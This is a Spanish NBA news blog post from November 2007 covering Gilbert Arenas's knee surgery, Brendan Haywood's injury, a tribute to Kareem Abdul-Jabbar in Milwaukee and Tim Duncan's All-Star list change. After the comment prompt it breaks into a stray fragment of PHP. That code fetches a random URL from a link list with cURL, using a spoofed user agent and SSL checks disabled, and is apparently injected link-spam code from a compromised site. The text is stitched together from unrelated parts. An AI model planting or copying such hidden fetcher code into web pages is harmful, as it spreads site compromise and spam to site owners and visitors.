Noticias NBA (22/11/07)

22 de November de 2007 por Gallis

La jornada de anoche nos deja varias noticias de interés. Sin duda la más relevante es la lesión de Gilbert Arenas.

Gilbert Arenas se perderá los 3 próximos meses de competición, tras ser operado ayer del ligamento de su rodilla izquierda. El jugador se había perdido ya 2 partidos por las molestias que sufría en su rodilla, la misma que se lesionó el pasado mes de abril. El jugador franquicia de los Wizards se sometió a unas pruebas y el equipo médico del equipo capitalino determinó que la mejor solución era someter a Arenas a dos operaciones esta misma noche. A partir de ahora el base de Washington estará 3 semanas inmovilizado y no regresará a las canchas hasta dentro de 3 meses, si no se producen problemas en su recuperación. Desde que el Agente Zero llegó a Washington y se convirtió en su jugador franquicia, en la temporada 2003/2004, el jugador se ha perdido 41 partidos, con un récord de 15 victorias y 26 derrotas.

Más lesiones y un homenaje más que merecido marcan el resto de la actualidad…

Sin duda la noticia en Washington es la lesión de Gilbert Arenas, pero no es el único problema con el que cuenta Eddie Jordan. El pívot titular del equipo, Brendan Haywood, fue baja en el partido de anoche y es seria duda para el viernes frente a Golden State. El jugador de los Wizards sufrió un esguince en su tobillo izquierdo en la victoria ante Philadelphia del pasado martes. Probó en el calentamiento del partido pero no pudo soportar el dolor. Hasta ahora Haywood está promediando 9.8 puntos, 9.7 rebotes y 1.8 tapones, sus máximos personales, por lo que se recuperación se antoja básica, más aún con la ausencia de Arenas.

Si el partido que enfrenta a Milwaukee Bucks y a Los Angeles Lakers es especial para alguien, sin duda es para Kareem Abdul-Jabbar. El legendario pívot fue homenajeado ayer en el Bradley Center durante el descanso del partido que enfrentó a Bucks y Lakers y que se cerró con victoria de los primeros por 110 a 103. Abdul-Jabbar jugó en Milwaukee desde 1969 a 1975, periodo en el que ganó un anillo (1971) y 3 MVP´s. Por esa razón, los Bucks colgaron una nueva camiseta con el número 33, que ya había sido retirado previamente por los cerveceros.

La NBA decidió ayer recolocar a Tim Duncan en la lista de Forwards para la elección del quinteto del próximo All-Star. En principio, el jugador de San Antonio había sido colocado en la lista de pívots, por lo que se enfrentaba a Yao Ming y todo el mercado chino para el puesto de titular. Tras ser movido a la lista de Forwards, sus posibilidades de formar parte del quinteto del Oeste por novena vez consecutiva aumentan considerablemente.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>